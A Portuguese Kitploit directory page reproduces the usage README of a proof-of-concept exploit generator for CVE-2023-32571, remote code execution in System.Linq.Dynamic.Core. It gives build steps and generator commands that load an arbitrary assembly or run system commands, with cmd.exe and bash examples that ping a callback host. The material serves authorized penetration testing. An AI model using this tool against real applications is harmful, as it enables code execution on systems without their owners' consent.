Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-32571 — Prova de Conceito para CVE-2023-32571 | Kitploit
Ferramentas/GitHubGitHub/sectex/cve-2023-32571
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubsectex/cve-2023-32571

CVE-2023-32571

Prova de Conceito para CVE-2023-32571

Ver Repositório
2há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🐞 CVE-2023-32571 - Execução Remota de Código no System.Linq.Dynamic.Core

Prova de Conceito para CVE-2023-32571, uma vulnerabilidade de execução remota de código no System.Linq.Dynamic.Core (1.0.7.10 a 1.2.25). Esta vulnerabilidade permite que atacantes executem código e comandos arbitrários quando entrada não confiável é analisada por métodos incluindo Where, Select, OrderBy.

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste autorizados. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. Os desenvolvedores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa.

🎯 Pré-requisitos

  • .NET 9.0 SDK ou posterior
  • Aplicação alvo usando versão vulnerável do System.Linq.Dynamic.Core (1.0.7.10 a 1.2.25)
  • Um servidor colaborador (ex.: Burp Collaborator, Interactsh) para observar callbacks

🛠️ Compilando o Projeto

  1. Compile o projeto:
    root@kitploit:~
    dotnet build --configuration Release
    
    A compilação produzirá
    • DLL do Payload em Payload/bin/Release/netstandard2.0/Payload.dll
Baixar ferramenta
  • Gerador de Payload em Generator/bin/Release/net9.0/Generator.dll
  • 🚀 Uso

    Modos

    A ferramenta suporta dois modos:

    1. AssemblyLoad (Modo 0): Carregar e executar um assembly .NET personalizado
    2. ProcessStart (Modo 1): Executar comandos do sistema diretamente via Process.Start

    Modo 0: AssemblyLoad (Padrão)

    root@kitploit:~
    # Usando codificação Base64
    ./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 1
    
    # Usando codificação Hex
    ./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 0
    
    root@kitploit:~
    # Usando codificação Base64
    Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 1
    
    # Usando codificação Hex
    Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 0
    

    Modo 1: ProcessStart (Execução Direta de Comandos)

    root@kitploit:~
    # Execução de comando no Windows
    ./Generator --mode 1 --parameters "cmd.exe /c ping <your-collaborator-url>"
    
    # Execução de comando no Linux
    ./Generator --mode 1 --parameters "bash -c ping <your-collaborator-url>"
    

    ⚙️ Parâmetros

    • --mode: Modo de exploração (0=AssemblyLoad, 1=ProcessStart)
    • --file: Caminho para o assembly .NET a ser carregado (obrigatório no modo AssemblyLoad)
    • --type: Nome de tipo totalmente qualificado para instanciar (obrigatório no modo AssemblyLoad)
    • --parameters: Parâmetros baseados no modo:
      • AssemblyLoad: Parâmetros do construtor (separados por vírgula)
      • ProcessStart: Comando para executar (ex.: 'cmd.exe /c whoami' ou 'bash -c whoami')
    • --encoding: Método de codificação para o modo AssemblyLoad (0=Hex, 1=Base64)

    📚 Referências

    • NIST NVD
    • NCCGROUP Advisory
    • System.Linq.Dynamic.Core GitHub Repository